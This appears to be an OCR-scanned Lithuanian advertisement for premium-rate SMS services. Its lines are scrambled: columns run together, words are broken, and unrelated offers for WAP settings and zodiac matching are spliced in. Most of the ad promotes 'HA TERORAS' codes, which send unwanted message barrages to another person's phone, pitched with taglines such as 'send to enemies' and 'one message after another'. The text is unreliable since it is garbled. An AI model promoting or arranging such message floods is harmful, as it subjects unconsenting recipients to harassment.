4 Kodas: ATSTOK - joks Įkyruolis neapsidžiaugs gavęs šią SMS porciją! 2 4 5 " 
Kodas: BAISUOKLIS privers patikoti savo baiauma! r > As Lšksii i 
Kodas: NERŪKYK - tikrai išvės iš katrybės rūkorius! "HA o Zen m r ženklas. 
Kodas: NEPATINKI - siųsk priešams! Pvz.: HA SHOR svarstykles saulys 
Kodas: STRESAS - viena žinutė po kitos! Kodėl?! - Siųsk numeriu: 1352 2Lt 


Kodas: SLUNKIS - tu esH slunkius! Tikras nevėkšla! Įsitikink, kad tavo telefone nustatyti WAP parametrai! Atsisiųsk parametrus iš savo opera 


Rašyk SMS: HA TERORAS kodas gavėjo tel. numeris toriaus! Ši žinutė automatiškai sukonfigūruos WAP - Nokia ir Sony Ericsson telefonams, 
Pvz.: HA TERORAS SEXY 3706XXXXXXX Sužinok, koks zodiako ženklas tau tinka WAP ir GPRS veikia OMNITEL, BITĖS ir TELE2 išskyrus MAŽYLIO) tinkluose 
Siųsk numeriu: 1350 5Lt geriausiai, o su kokiu geriau net neprasidėti. Rašyk žinutę: GPRSWAP Siųsk numeriu: 1352 2it 


